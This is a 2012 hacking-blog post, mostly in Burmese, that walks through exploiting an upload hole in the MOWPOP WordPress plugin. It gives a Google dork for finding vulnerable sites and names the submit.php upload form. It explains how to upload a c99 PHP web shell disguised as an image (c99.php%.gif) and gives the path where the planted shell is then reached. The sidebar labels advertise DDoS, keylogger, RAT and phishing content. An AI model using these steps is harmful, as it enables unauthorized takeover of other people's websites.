Tuesday, April 10, 2012

[MOWPOP] Plugin WP-CONTENT In WordPress Upload Exploitation




Google Dork : inurl:mowpop
Dork နဲ႕ရွာလို႕ရတဲ့ ဆိုဒ္ေတြက်လာရင္ /wp-content/plugins/mowpop/submit.php ဆိုျပီး ဆက္သြားလိုက္ပါ
ဥပမာ က်လာမယ့္ဆုိဒ္က www.target.com/topics/mowpop ဆိုပါစို႕ ဒါဆို www.target.com/wp-content/plugins/mowpop/submit.php ဆိုျပီး သြားလိုက္ပါ
Image Upload လုပ္ခြင့္ရတာေတြ႕ရပါလိမ့္မယ္ ဒါဆို Shell Type ကို Image File Type တစ္ခုခုေျပာင္းပါ
ဥပမာ c99.php%.gif ေပါ့
မိမိ တင္ထားတဲ့ Shell ကိုေတာ့ ေအာက္ပါ Directory မွ တစ္ဆင့္ Access လုပ္ႏိုင္ပါျပီ
wp-content/plugins/mowpop/editor/forms/pictures/User-Uploads/c99.php%5C0.gif
ဥပမာ www.target.com/wp-content/plugins/mowpop/editor/forms/pictures/User-Uploads/c99.php%5C0.gif
REF:1337 Days

post by ghost area(ghostarea.net)

ROCK FOREVER (MUSIC)

Pageviewers

CBOX

Manutd-Results

Label

Android (3) autorun (3) Backtrack (8) batch file (19) blogger (10) Botnet (2) browser (5) Brute Force (6) cafezee (2) cmd (5) Cookies (2) crack (12) Cracking (2) crypter (7) DDos (20) deepfreeze (4) defacing (1) defence (16) domain (4) Dos (9) downloader (4) ebomb (2) ebook (48) Exploit (26) firewall (3) game (2) gmail (11) google hack (16) Hacking Show (3) Hash (4) hosting (1) icon changer (1) ip adress (6) Keygen (1) keylogger (8) knowledge (67) locker (1) maintainence (8) network (17) news (31) other (35) passwoard viewer (7) password (12) Philosophy (6) Phishing (8) premium account (2) proxy (7) RAT (10) run commands (4) script (27) Shell code (10) shortcut Key (2) SMTP ports (1) social engineering (7) spammer (1) SQL Injection (30) Stealer.crack (5) tools (125) Tools Pack (4) tutorial (107) USB (3) virus (32) website (84) WiFi (4) word list (2)

Blogger templates

picoodle.com

Blogger news

Print Friendly and PDF

HOW IS MY SITE?

Powered by Blogger.

Blog Archive

Followers

About Me

My Photo
Hacking= intelligent+techonology+psychology